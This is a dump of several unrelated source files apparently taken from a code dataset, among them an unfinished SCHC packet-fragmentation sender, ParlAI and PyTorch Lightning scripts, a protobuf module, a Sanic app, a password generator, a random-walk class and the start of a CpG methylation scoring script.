self.nb_fragment = (len(full_packet) + fragment_size-1) // fragment_size
# 1376 Intially, when a fragmented packet need to be sent, the window is set
# 1377 to 0, a local_bit map is set to 0, and FCN is set the the highe
# 1378 possible value depending on the number of fragment that will be sent
# 1379 in the window (INIT STATE).
self.state = "INIT"
self.window_index = 0
# (some of these variables are duplicates of the class fragment.fragment)
self.full_packet = full_packet
self.full_packet_position = 0
self.window_index = 0
self.window_max_size = window_max_size
self.R = R
self.T = T
self.N = N
self.M = M
self.format_mgr = SchcFragmentFormat(R=R, T=T, N=N, M=M, mode="window")
print("STATE INIT, fragmentation parameters:")
print(" nb_fragment={}".format(self.nb_fragment))
print(" fragment_size={}".format(fragment_size))
print(" R(header size)={}".format(self.R))
print(" T(DTag size)={}".format(self.T))
print(" N(FCN size)={}".format(self.N))
self.init_current_window()
def init_current_window(self):
# pre-compute the fragments to send in the window, and init variables.
# (the fragment_size is allowed to be changed between windows)
assert self.full_packet_position < len(self.full_packet)
remaining_nb_byte = len(self.full_packet) - self.full_packet_position
remaining_nb_fragment = (
(remaining_nb_byte + self.fragment_size-1) // self.fragment_size )
assert remaining_nb_fragment > 0
self.is_last_window = (remaining_nb_fragment < self.window_max_size)
if not self.is_last_window:
self.window_size = self.window_max_size
else: self.window_size = remaining_nb_fragment
p, fs = self.full_packet_position, self.fragment_size
self.fragment_list = [ self.full_packet[p+i*fs:p+(i+1)*(fs)]
for i in range(self.window_size)]
self.window_fragment_index = 0
print("window #{} last={} nb_frag={}\n frag={}".format(
self.window_size, self.is_last_window, self.window_size,
self.fragment_list))
#--------------------------------------------------
def start(self):
assert self.state == "INIT"
self.state = "SEND"
self.send_current_fragment()
def get_current_fcn(self):
fi = self.window_fragment_index
if self.is_last_window and fi == self.window_size-1:
# 913 are expected when there is no error. The FCN for the last fragment
# 914 is an all-1. It is also important to note that, for No ACK mode or
return self.format_mgr.get_all_1(), True
else:
return self.window_size-1 - fi, False
def send_current_fragment(self):
assert self.state == "SEND"
frag_content = self.fragment_list[self.window_fragment_index]
advertized_fcn, is_very_last_fragment = self.get_current_fcn()
if is_very_last_fragment:
mic = self.mic
else: mic = b""
full_fragment = self.format_mgr.pack_fragment(
rule_id = self.rule_id, dtag = self.dtag,
window_index = self.window_index,
advertized_fcn = advertized_fcn,
payload = frag_content, mic = mic
)
self.system_manager.send_packet(full_fragment)
# 1384 regulation rules or constraints imposed by the applications. Each
# 1385 time a fragment is sent the FCN is decreased of one value and the
# 1386 bitmap is set. The send state can be leaved for different reasons
# XXX: is the bitmap the one of the FCN?
if self.window_fragment_index == self.window_size-1:
# 1386 bitmap is set. The send state can be leaved for different reasons
# 1387 (for both reasons it goes to WAIT BITMAP STATE):
self.state = "WAIT BITMAP"
if is_very_last_fragment:
# 1471 [...] FCN==0 & more frags [...]
# 1389 o The FCN reaches value 0 and there are more fragments. In that
# 1390 case an all-0 fragmet is sent and the timer is set. The sender
# 1391 will wait for the bitmap acknowledged by the receiver.
self.system_manager.add_event(
WAIT_BITMAP_TIMEOUT,
self.event_wait_bitmap_timeout_check, (self.window_index, False))
else:
# 1471 [...] last frag [...]
# 1393 o The last fragment is sent. In that case an all-1 fragment with
# 1394 the MIC is sent and the sender will wait for the bitmap
# 1395 acknowledged by the receiver. The sender set a timer to wait for
# 1396 the ack.
self.system_manager.add_event(
WAIT_BITMAP_TIMEOUT,
self.event_wait_bitmap_timeout_check, (self.window_index, True))
else:
self.window_fragment_index += 1
self.system_manager.add_event(
INTER_FRAGMENT_DELAY, self.event_next_fragment, ())
#--------------------------------------------------
def send_empty_fragment(self):
# 1410 In ACK Always, if the timer expire, an empty All-0 (or All-1 if the
# 1411 last fragment has been sent) fragment is sent to ask the receiver to
if self.is_last_window:
advertized_fcn = self.format_mgr.get_all_0()
else: advertized_fcn = self.format_mgr.get_all_1()
XXX
self.system_manager.send_packet(empty_fragment)
def is_finished(self):
return not (self.position < len(self.full_packet))
def get_next_fragment_real(self):
return self.fragment.next_fragment(self.fragment_size)
def event_next_fragment(self):
assert self.state == "SEND"
# 1464 [...] send Window + frag(FCN)
self.send_current_fragment()
def event_wait_bitmap_timeout_check(self, window_index, final):
assert window_index <= self.window_index
if window_index != self.window_index:
return # not really a time out (as window_index has progressed)
assert self.state == "WAIT BITMAP"
# 1410 In ACK Always, if the timer expire, an empty All-0 (or All-1 if the
# 1411 last fragment has been sent) fragment is sent to ask the receiver to
# 1412 resent its bitmap. The window number is not changed.
print("WAIT BITMAP: timeout")
warnings.warn("XXX:should implement MAX_ATTEMPTS")
self.send_empty_fragment()
self.system_manager.add_event(
WAIT_BITMAP_TIMEOUT,
self.event_wait_bitmap_timeout_check, (self.window, True))
def event_packet(self, raw_packet):
#print("RECEIVE", raw_packet)
if self.state == "INIT":
print("ERROR: unexpected packet in state INIT", raw_packet)
return
elif self.state == "SEND":
print("ERROR: unexpected packet in state SEND", raw_packet)
return
elif self.state == "WAIT BITMAP":
# XXX:how do we know the packet format?:
self.process_ack(raw_packet)
else: raise RuntimeError("unexpected state", self.state)
def process_ack(self, raw_packet):
warnings.warn("XXX:hardwired formats, sizes, constants")
window, bitmap = struct.unpack(b"!BB", raw_packet)
bitmap = bitmap >> 1 # XXX - only for hardcoded case
print("ACK", window, bitmap, self.bitmap)
# 1662 If the window number on the received bitmap is correct, the sender
if window != self.window:
print("ERROR: bad window number", window, self.window)
return
if bitmap & ~self.bitmap != 0:
print("ERROR: inconsistent bitmap", bitmap, self.bitmap)
# XXX: what to do? - should not happen except for last
return
resend_bitmap = self.bitmap & ~bitmap
if resend_bitmap == 0:
# 1662 If the window number on the received bitmap is correct, the sender
# 1663 compare the local bitmap with the received bitmap. If they are equal
# 1664 all the fragments sent during the window have been well received. If
if not self.is_finished():
# 1665 at least one fragment need to be sent, the sender clear the bitmap,
# 1666 stop the timer and move its sending window to the next value. If no
# XXX: (optional) stop timer
self.window_index += 1
self.window = self.window+1 # XXX!!: modulo
nb_remaining_fragment = (self.nb_fragment
- self.window_size * self.window_index)
print("UPDATE:", nb_remaining_fragment, self.nb_fragment,
self.window_size, self.window_index)
self.fcn = min(nb_remaining_fragment, self.max_fcn) # XXX:factor in
unfinished, packet = self.get_next_fragment()
self.state = "SEND"
self.send_fragment_and_prepare_next(packet, unfinished)
else:
# 1667 more fragments have to be sent, then the fragmented packet
# 1668 transmission is terminated.
self.state = "END"
self.event_transmission_completed()
else:
# 1670 If some fragments are missing (not set in the bit map) then the
# 1671 sender resend the missing fragments. When the retransmission is
# 1672 finished, it start listening to the bitmap (even if a All-0 or All-1
# 1673 has not been sent during the retransmission) and returns to the
# 1674 waiting bitmap state.
# 1685 If the local-bitmap is different from the received bitmap the counter
# 1686 Attemps is increased and the sender resend the missing fragments
# 1687 again, when a MAX_ATTEMPS is reached the sender sends an Abort and
# 1688 goes to error.
raise NotImplementedError("XXX not implemented yet, sorry")
def event_transmission_completed(self):
print("transmssion completed")
def get_current_fragment(self):
print("fragment window={} fcn={} current_frag_index={}".format(
self.window, self.fcn, self.fragment_index))
header = struct.pack(b"!BB", self.window, self.fcn)
return header + bytes(self.content[self.fragment_index].encode("ascii"))
def process_ack_old(self, raw_packet):
# Next fragment
self.window = (self.window+1) % 2 # protocol
self.fcn = self.max_fcn_per_window # - because it will be the first of the new window
self.fragment_index += 1 # internal data structure
if self.fragment_index == len(self.content):
print("Finished trasnmission of fragments")
return b""
if self.fragment_index == len(self.content)-1:
self.fcn = 1 # protocol - because it is the end of the content in this case
return self.get_current_fragment() # XXX + "MIC"
else:
return self.get_current_fragment()
#---------------------------------------------------------------------------
| 2.328125 | 2 |
examples/eval_model_human.py | hwaranlee/ParlAI | 1 | 12773165 | # Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
# <NAME>, KAIST: 2017-present
"""Basic example which iterates through the tasks specified and
evaluates the given model on them.
For example:
`python examples/eval_model.py -t "babi:Task1k:2" -m "repeat_label"`
or
`python examples/eval_model.py -t "#CornellMovie" -m "ir_baseline" -mp "-lp 0.5"`
"""
import torch
from parlai.core.agents import create_agent
from parlai.core.worlds import create_task
from parlai.core.params import ParlaiParser
import random
import pdb
import logging, sys
from examples.train_model_seq2seq_ldecay import run_eval
def main():
# Get command line arguments
parser = ParlaiParser(True, True)
parser.set_defaults(datatype='valid')
parser.add_argument('-logger', '--log-file', default='', help='log file name')
parser.add_argument('--local-human', default=True, type='bool', help='evaluate interactively with local human input')
parser.add_argument('--display-examples', default=False, type='bool', help='display examples during evaluation')
parser.add_argument('--split-gpus', type=bool, default=False, help='Split gpus for a large model.')
opt = parser.parse_args()
# Set logging
if opt['log_file'] != '':
logger = logging.getLogger('Evaluation: Seq2seq')
logger.setLevel(logging.INFO)
fmt = logging.Formatter('%(asctime)s: %(message)s', '%m/%d/%Y %I:%M:%S %p')
console = logging.StreamHandler()
console.setFormatter(fmt)
logger.addHandler(console)
if 'log_file' in opt:
logfile = logging.FileHandler(opt['log_file'], 'w')
logfile.setFormatter(fmt)
logger.addHandler(logfile)
logger.info('[ COMMAND: %s ]' % ' '.join(sys.argv))
# Possibly build a dictionary (not all models do this).
#assert opt['dict_file'] is None, '[ Put dict file ]'
# Create model and assign it to the specified task
agent = create_agent(opt)
world = create_task(opt, agent)
run_eval(agent, opt, 'valid', write_log=True, logger=logger, generate=True, local_human=opt['local_human'])
world.shutdown()
if __name__ == '__main__':
main()
| 2.1875 | 2 |
imm/_state.py | EBI-Metagenomics/imm-py | 0 | 12773166 | <reponame>EBI-Metagenomics/imm-py
from __future__ import annotations
from enum import Enum
from typing import Iterable, Type
from ._alphabet import Alphabet
from ._cdata import CData
from ._ffi import ffi, lib
from ._lprob import lprob_is_valid
from ._sequence import Sequence
from ._sequence_table import SequenceTable
__all__ = ["State", "StateType", "NormalState", "MuteState", "TableState"]
class StateType(Enum):
MUTE = 0x00
NORMAL = 0x01
TABLE = 0x02
class State:
def __init__(self, imm_state: CData, alphabet: Alphabet):
"""
State.
Parameters
----------
imm_state
State pointer.
alphabet
Alphabet.
"""
self._imm_state = imm_state
if self._imm_state == ffi.NULL:
raise RuntimeError("`imm_state` is NULL.")
self._alphabet = alphabet
@property
def alphabet(self) -> Alphabet:
return self._alphabet
@property
def imm_state(self) -> CData:
return self._imm_state
@property
def name(self) -> bytes:
return ffi.string(lib.imm_state_get_name(self._imm_state))
@property
def min_seq(self) -> int:
return lib.imm_state_min_seq(self._imm_state)
@property
def max_seq(self) -> int:
return lib.imm_state_max_seq(self._imm_state)
def lprob(self, sequence: Sequence) -> float:
"""
Log-space probability of sequence emission.
Parameters
----------
sequence
Sequence.
"""
lprob: float = lib.imm_state_lprob(self._imm_state, sequence.imm_seq)
if not lprob_is_valid(lprob):
raise RuntimeError("Could not get probability.")
return lprob
def __str__(self) -> str:
# Refer to https://github.com/pytest-dev/pytest/issues/4659
if self._imm_state == ffi.NULL:
raise RuntimeError("State has failed to initialize.")
return f"{self.name.decode()}"
def __repr__(self) -> str:
return f"<{self.__class__.__name__}:{str(self)}>"
class MuteState(State):
def __init__(self, imm_mute_state: CData, alphabet: Alphabet):
"""
Mute state.
Parameters
----------
imm_mute_state
State pointer.
alphabet
Alphabet.
"""
self._imm_mute_state = imm_mute_state
if self._imm_mute_state == ffi.NULL:
raise RuntimeError("`imm_mute_state` is NULL.")
super().__init__(lib.imm_mute_state_super(self._imm_mute_state), alphabet)
@classmethod
def create(cls: Type[MuteState], name: bytes, alphabet: Alphabet) -> MuteState:
"""
Mute state.
Parameters
----------
name
State name.
alphabet
Alphabet.
"""
imm_mute_state = lib.imm_mute_state_create(name, alphabet.imm_abc)
return cls(imm_mute_state, alphabet)
def __del__(self):
if self._imm_mute_state != ffi.NULL:
lib.imm_mute_state_destroy(self._imm_mute_state)
def __repr__(self):
return f"<{self.__class__.__name__}:{str(self)}>"
class NormalState(State):
def __init__(self, imm_normal_state: CData, alphabet: Alphabet):
"""
Normal state.
Parameters
----------
imm_normal_state
State pointer.
alphabet
Alphabet.
"""
self._imm_normal_state = imm_normal_state
if self._imm_normal_state == ffi.NULL:
raise RuntimeError("`imm_normal_state` is NULL.")
super().__init__(lib.imm_normal_state_super(self._imm_normal_state), alphabet)
@classmethod
def create(
cls: Type[NormalState], name: bytes, alphabet: Alphabet, lprobs: Iterable[float]
) -> NormalState:
"""
Normal state.
Parameters
----------
name
State name.
alphabet
Alphabet.
lprobs
Emission probabilities in log-space for each alphabet letter.
"""
ptr = lib.imm_normal_state_create(name, alphabet.imm_abc, list(lprobs))
return cls(ptr, alphabet)
def __del__(self):
if self._imm_normal_state != ffi.NULL:
lib.imm_normal_state_destroy(self._imm_normal_state)
def __repr__(self):
return f"<{self.__class__.__name__}:{str(self)}>"
class TableState(State):
def __init__(self, imm_table_state: CData, alphabet: Alphabet):
"""
Table state.
Parameters
----------
imm_table_state
State pointer.
alphabet
Alphabet.
"""
self._imm_table_state = imm_table_state
if self._imm_table_state == ffi.NULL:
raise RuntimeError("`imm_table_state` is NULL.")
super().__init__(lib.imm_table_state_super(imm_table_state), alphabet)
@classmethod
def create(
cls: Type[TableState], name: bytes, sequence_table: SequenceTable
) -> TableState:
"""
Create table state.
Parameters
----------
name
State name.
sequence_table
Table of sequence probabilities.
"""
ptr = lib.imm_table_state_create(name, sequence_table.imm_seq_table)
return cls(ptr, sequence_table.alphabet)
def __del__(self):
if self._imm_table_state != ffi.NULL:
lib.imm_table_state_destroy(self._imm_table_state)
def __repr__(self):
return f"<{self.__class__.__name__}:{str(self)}>"
| 2.125 | 2 |
reporter/urls.py | AIRUNGU/promosy | 0 | 12773167 | from django.urls import path
from django.conf.urls import url
from reporter import views as r_views
from djgeojson.views import GeoJSONLayerView
from reporter import models as r_models
urlpatterns = [
path('home', r_views.Prohome, name='home'),
path('report/<str:code>/', r_views.Proreporter, name='code'),
path('data.geojson', GeoJSONLayerView.as_view(model=r_models.RealMapping), name='data')
] | 1.648438 | 2 |
pointnet2/train.py | hasanhamidi/Pointnet2_PyTorch | 0 | 12773168 | import os
import sys
pointnet2_dir = os.path.split(os.path.abspath(__file__))[0]
main_dir = "/".join(pointnet2_dir.split("/")[0:-1])
pointnet2_ops_lib_dir = main_dir+"/pointnet2_ops_lib/"
sys.path.insert(0,main_dir)
sys.path.insert(0,pointnet2_ops_lib_dir)
import hydra
import omegaconf
import pytorch_lightning as pl
import torch
from pytorch_lightning.loggers import TensorBoardLogger
from surgeon_pytorch import Inspect,get_layers
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def hydra_params_to_dotdict(hparams):
def _to_dot_dict(cfg):
res = {}
for k, v in cfg.items():
if isinstance(v, omegaconf.DictConfig):
res.update(
{k + "." + subk: subv for subk, subv in _to_dot_dict(v).items()}
)
elif isinstance(v, (str, int, float, bool)):
res[k] = v
return res
return _to_dot_dict(hparams)
@hydra.main("config/config.yaml")
def main(cfg):
model = hydra.utils.instantiate(cfg.task_model, hydra_params_to_dotdict(cfg))
early_stop_callback = pl.callbacks.EarlyStopping(patience=5)
checkpoint_callback = pl.callbacks.ModelCheckpoint(
monitor="val_acc",
mode="max",
save_top_k=2,
filepath=os.path.join(
cfg.task_model.name, "{epoch}-{val_loss:.2f}-{val_acc:.3f}"
),
verbose=True,
)
trainer = pl.Trainer(
gpus=list(cfg.gpus),
max_epochs=cfg.epochs,
early_stop_callback=early_stop_callback,
checkpoint_callback=checkpoint_callback,
distributed_backend=cfg.distrib_backend
)
print(get_layers(model))
# trainer.fit(model)
# trainer.test(model)
if __name__ == "__main__":
main()
| 2 | 2 |
nicu_los/src/utils/data_helpers.py | bt-s/NICU-length-of-stay-prediction | 2 | 12773169 | <filename>nicu_los/src/utils/data_helpers.py
#!/usr/bin/python3
"""data_helpers.py
Various utility functions for data loading
"""
__author__ = "<NAME>"
import json, os, random
import numpy as np
import pandas as pd
from sklearn.utils import shuffle
from tqdm import tqdm
from nicu_los.src.utils.utils import get_subject_dirs
def create_list_file(subject_dirs, list_file_path,
ts_fname='timeseries_normalized.csv'):
"""Create a file containing a list of paths to timeseries data frames
Args:
subject_dirs (list): List of subject directories
list_file_path (str): Path to the list file
ts_fname (str): Name of the timeseries file
"""
with open(list_file_path, 'a') as f:
for i, sd in enumerate(tqdm(subject_dirs)):
ts = pd.read_csv(os.path.join(sd, ts_fname))
# Start from 4, since we only start predicting from the first four
# hours of the stay
for row in range(4, len(ts)+1):
f.write(f'{sd}, {row}\n')
def data_generator(list_file, config='nicu_los/config.json',
ts_file='timeseries_normalized.csv', coarse_targets=False,
gestational_age=True, mask=True, task='classification',
shuffle=True):
"""Data loader function
Args:
list_file (str): Path to the .txt file containing a list of (filename,
sequence length) combinations
config (str): Path to the nicu_los config file
ts_file (str): Name of the files containing the timeseries
coarse_targets (bool): Whether to use coarse targets
gestational_age (bool): Whether to use the gestational age variable
mask (bool): Whether to use missingness indicator variables
task (str): One of 'classification' and 'regression'
shuffle (bool): Whether to shuffle the data
Yields:
X (np.ndarray): Features corresponding to one data batch
EITHER (if task == 'regression'):
y (int): Target -- the remaining LOS in hours
OR (if task == 'classification'):
t (int): Target -- the bucketed LOS class
"""
with open(list_file, 'r') as f:
data = f.readlines()
data = [line.split(',') for line in data]
data = [(subject_dir, int(row)) for (subject_dir, row) in data]
with open(config) as f:
config = json.load(f)
variables = config['variables']
if not gestational_age and "GESTATIONAL_AGE_DAYS" in variables:
variables.remove("GESTATIONAL_AGE_DAYS")
if mask:
variables = variables + ['mask_' + v for v in variables]
if shuffle:
random.shuffle(data)
while True:
if shuffle:
random.shuffle(data)
index = 0
while index < len(data)-1:
sd, row = data[index][0], data[index][1]
index += 1
ts = pd.read_csv(os.path.join(sd, ts_file))[:row]
X = ts[variables].to_numpy()
y = ts.LOS_HOURS.iloc[-1]
if coarse_targets:
t = ts.TARGET_COARSE.iloc[-1]
else:
t = ts.TARGET_FINE.iloc[-1]
if task == 'regression':
yield (X, y)
else:
yield (X, t)
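# Usage sketch (illustrative; 'data/train_list.txt' as produced by
# create_list_file above):
#   gen = data_generator(os.path.join('data', 'train_list.txt'),
#                        coarse_targets=True)
#   X, t = next(gen)  # one (features, bucketed-target) pair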
def get_baseline_datasets(subject_dirs, coarse_targets=False, pre_imputed=False,
targets_only=False, config='nicu_los/config.json'):
"""Obtain baseline data sets
Args:
subject_dirs (list): List of subject directories
coarse_targets (bool): Whether to use coarse targets
pre_imputed (bool): Whether to use features from pre-imputed data
targets_only (bool): Whether to only load the targets
Returns:
X (np.ndarray|None): Features
y (np.array): Targets -- remaining LOS
t (np.array): Target -- buckets
"""
tot_num_sub_seqs = 0
for i, sd in enumerate(tqdm(subject_dirs)):
tot_num_sub_seqs += len(pd.read_csv(os.path.join(sd,
'timeseries.csv')))
with open(config) as f:
config = json.load(f)
variables = config['variables']
sub_seqs = config['baseline_subsequences']
stat_fns = config['stat_fns']
# Add the masks
variables = ['mask_' + v for v in variables]
if not targets_only:
X = np.zeros((tot_num_sub_seqs,
len(variables)*len(sub_seqs)*len(stat_fns)))
else:
X = None
y, t = np.zeros(tot_num_sub_seqs), np.zeros(tot_num_sub_seqs)
if coarse_targets:
target_str = 'coarse'
else:
target_str = 'fine'
pi_str = ''
if pre_imputed:
pi_str = '_pre_imputed'
cnt = 0
for i, sd in enumerate(tqdm(subject_dirs)):
cnt_old = cnt
if not targets_only:
x = np.load(os.path.join(sd, f'X_baseline{pi_str}.npy'))
yy = np.load(os.path.join(sd, f'y_baseline{pi_str}.npy'))
tt = np.load(os.path.join(sd, f't_baseline_{target_str}{pi_str}.npy'))
cnt += len(yy)
if not targets_only:
X[cnt_old:cnt, :] = x
y[cnt_old:cnt] = yy
t[cnt_old:cnt] = tt
if not targets_only:
X, y, t = shuffle(X, y, t)
return X, y, t
else:
y, t = shuffle(y, t)
return y, t
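# Usage sketch (illustrative; the argument passed to get_subject_dirs is a
# hypothetical path):
#   train_dirs = get_subject_dirs(os.path.join('data', 'train'))
#   X_train, y_train, t_train = get_baseline_datasets(train_dirs,
#                                                     coarse_targets=True)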
def get_optimal_bucket_boundaries(n=100):
"""Function to get the optimal bucket boundaries
Args:
n (int): Number of buckets
Returns:
bucket_boundaries (list): Optimal bucket boundaries for n
"""
train_list_file = os.path.join('data', 'train_list.txt')
val_list_file = os.path.join('data', 'val_list.txt')
test_list_file = os.path.join('data', 'test_list.txt')
list_files = [train_list_file, val_list_file, test_list_file]
data = []
for list_file in list_files :
with open(list_file, 'r') as f:
data += f.readlines()
data = [line.split(',') for line in data]
data = [(subject_dir, int(row)) for (subject_dir, row) in data]
rows = []
for _, r in data:
rows.append(r)
rows = sorted(rows)
bucket_boundaries = []
for i in range(n):
bucket_boundaries.append(rows[len(rows) // n * i])
return bucket_boundaries
| 2.734375 | 3 |
yacht/config/proto/policy_pb2.py | IusztinPaul/yacht | 5 | 12773170 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: yacht/config/proto/policy.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from yacht.config.proto import feature_extractor_pb2 as yacht_dot_config_dot_proto_dot_feature__extractor__pb2
from yacht.config.proto import net_architecture_pb2 as yacht_dot_config_dot_proto_dot_net__architecture__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='yacht/config/proto/policy.proto',
package='yacht.config.proto',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x1fyacht/config/proto/policy.proto\x12\x12yacht.config.proto\x1a*yacht/config/proto/feature_extractor.proto\x1a)yacht/config/proto/net_architecture.proto\"\xb7\x01\n\x0cPolicyConfig\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x15\n\ractivation_fn\x18\x02 \x01(\t\x12\x45\n\x11\x66\x65\x61ture_extractor\x18\x03 \x01(\x0b\x32*.yacht.config.proto.FeatureExtractorConfig\x12;\n\x08net_arch\x18\x04 \x01(\x0b\x32).yacht.config.proto.NetArchitectureConfigb\x06proto3')
,
dependencies=[yacht_dot_config_dot_proto_dot_feature__extractor__pb2.DESCRIPTOR,yacht_dot_config_dot_proto_dot_net__architecture__pb2.DESCRIPTOR,])
_POLICYCONFIG = _descriptor.Descriptor(
name='PolicyConfig',
full_name='yacht.config.proto.PolicyConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='yacht.config.proto.PolicyConfig.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='activation_fn', full_name='yacht.config.proto.PolicyConfig.activation_fn', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature_extractor', full_name='yacht.config.proto.PolicyConfig.feature_extractor', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='net_arch', full_name='yacht.config.proto.PolicyConfig.net_arch', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=143,
serialized_end=326,
)
_POLICYCONFIG.fields_by_name['feature_extractor'].message_type = yacht_dot_config_dot_proto_dot_feature__extractor__pb2._FEATUREEXTRACTORCONFIG
_POLICYCONFIG.fields_by_name['net_arch'].message_type = yacht_dot_config_dot_proto_dot_net__architecture__pb2._NETARCHITECTURECONFIG
DESCRIPTOR.message_types_by_name['PolicyConfig'] = _POLICYCONFIG
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PolicyConfig = _reflection.GeneratedProtocolMessageType('PolicyConfig', (_message.Message,), dict(
DESCRIPTOR = _POLICYCONFIG,
__module__ = 'yacht.config.proto.policy_pb2'
# @@protoc_insertion_point(class_scope:yacht.config.proto.PolicyConfig)
))
_sym_db.RegisterMessage(PolicyConfig)
# @@protoc_insertion_point(module_scope)
| 1.21875 | 1 |
sanic_template/runner.py | aragentum/sanic-template | 2 | 12773171 |
from sanic import Sanic
from sanic_template import database, api, error
from sanic_template.conf import settings
from sanic_template.other import logging
app = Sanic("sanic_app", log_config=settings.LOGGING_CONFIG)
app.config.from_object(settings)
# init
logging.setup()
database.setup(app)
api.setup(app)
error.setup(app)
@app.listener("after_server_start")
async def create_initial_data(app, loop):
from sanic_template.database.repo.user_repo import user_repo
await user_repo.create_or_update("aragentum", "Roman", "Averchenkov")
def run():
app.run(host="0.0.0.0", port=8000, workers=1,
debug=app.config.DEBUG, auto_reload=app.config.DEBUG)
if __name__ == '__main__':
run()
| 2.078125 | 2 |
app/password_generator.py | chrisstime/nutcracker | 0 | 12773172 |
#!/usr/bin/env python3
"""Password generator module"""
from random import sample, choices
from string import ascii_letters, punctuation, digits
options_dict = {
'symbols': punctuation,
'letters': ascii_letters,
'numbers': digits
}
def _shuffle_characters(symbols: bool, letters: bool, numbers: bool):
included_characters = list()
characters_dict = {'symbols': symbols, 'letters': letters, 'numbers': numbers}
for character_type, include_option in characters_dict.items():
if include_option:
included_characters.extend(options_dict[character_type])
if included_characters:
return sample(included_characters, len(included_characters))
def _format_password(generated_password_array):
return "".join(generated_password_array)
def generate_password(symbols: bool, letters: bool, numbers: bool, password_length):
shuffled_characters = _shuffle_characters(symbols=symbols, letters=letters, numbers=numbers)
if shuffled_characters:
return _format_password(choices(shuffled_characters, k=password_length))
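# Example (illustrative): a 12-character password drawn from letters and digits
#   >>> pw = generate_password(symbols=False, letters=True, numbers=True, password_length=12)
#   >>> len(pw)
#   12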
| 3.6875 | 4 |
random_walk.py | leksoid/data-vis-project | 0 | 12773173 |
from random import choice
class RandomWalk:
"""A class to generate random walks"""
def __init__(self, num_points=5000):
self.num_points = num_points
self.x_values = [0]
self.y_values = [0]
def fill_walk(self):
"""Calculate all the points in the walk"""
while len(self.x_values) < self.num_points:
x_step = self.get_step()
y_step = self.get_step()
if x_step == 0 and y_step == 0:
continue
x = self.x_values[-1] + x_step
y = self.y_values[-1] + y_step
self.x_values.append(x)
self.y_values.append(y)
def get_step(self):
        return choice([1, -1]) * choice([0, 1, 2, 3, 4])
| 3.65625 | 4 |
aligned_bam_to_cpg_scores.py | PacificBiosciences/pb-CpG-tools | 5 | 12773174 | #!/usr/bin/env python
# coding: utf-8
import argparse
import concurrent.futures
import logging
import numpy as np
import pandas as pd
import pyBigWig
import pysam
import os
import re
import sys
from Bio import SeqIO
from Bio.Seq import Seq
from collections import Counter
from numpy.lib.stride_tricks import sliding_window_view
from operator import itemgetter
from tqdm import tqdm
# hide GPUs so the TensorFlow model runs CPU-only in the worker processes
os.environ["CUDA_VISIBLE_DEVICES"] = ""
def get_args():
"""
Get arguments from command line with argparse.
"""
parser = argparse.ArgumentParser(
prog='aligned_bam_to_cpg_scores.py',
description="""Calculate CpG positions and scores from an aligned bam file. Outputs raw and
coverage-filtered results in bed and bigwig format, including haplotype-specific results (when available).""")
parser.add_argument("-b", "--bam",
required=True,
metavar="input.bam",
help="The aligned BAM file.")
parser.add_argument("-f", "--fasta",
required=True,
metavar="ref.fasta",
help="The reference fasta file.")
parser.add_argument("-o", "--output_label",
required=True,
metavar="label",
help="Label for output files, which results in [label].bed/bw.")
parser.add_argument("-p", "--pileup_mode",
required=False,
choices=["model", "count"],
default="model",
help="Use a model-based approach to score modifications across sites (model) "
"or a simple count-based approach (count). [default = %(default)s]")
parser.add_argument("-d", "--model_dir",
required=False,
default=None,
metavar="/path/to/model/dir",
help="Full path to the directory containing the model (*.pb files) to load. [default = None]")
parser.add_argument("-m", "--modsites",
required=False,
choices=["denovo", "reference"],
default="denovo",
help="Only output CG sites with a modification probability > 0 "
"(denovo), or output all CG sites based on the "
"supplied reference fasta (reference). [default = %(default)s]")
parser.add_argument("-c", "--min_coverage",
required=False,
default=4,
type=int,
metavar="int",
help="Minimum coverage required for filtered outputs. [default: %(default)d]")
parser.add_argument("-q", "--min_mapq",
required=False,
default=0,
type=int,
metavar="int",
help="Ignore alignments with MAPQ < N. [default: %(default)d]")
parser.add_argument("-a", "--hap_tag",
required=False,
default="HP",
metavar="TAG",
help="The SAM tag containing haplotype information. [default: %(default)s]")
parser.add_argument("-s", "--chunksize",
required=False,
default=500000,
type=int,
metavar="int",
help="Break reference regions into chunks "
"of this size for parallel processing. [default = %(default)d]")
parser.add_argument("-t", "--threads",
required=False,
default=1,
type=int,
metavar="int",
help="Number of threads for parallel processing. [default = %(default)d]")
return parser.parse_args()
def setup_logging(output_label):
"""
Set up logging to file.
"""
logname = "{}-aligned_bam_to_cpg_scores.log".format(output_label)
# ensure logging file does not exist, if so remove
if os.path.exists(logname):
os.remove(logname)
# set up logging to file
logging.basicConfig(filename=logname,
format="%(asctime)s: %(levelname)s: %(message)s",
datefmt='%d-%b-%y %H:%M:%S',
level=logging.DEBUG)
def log_args(args):
"""
Record argument settings in log file.
"""
logging.info("Using following argument settings:")
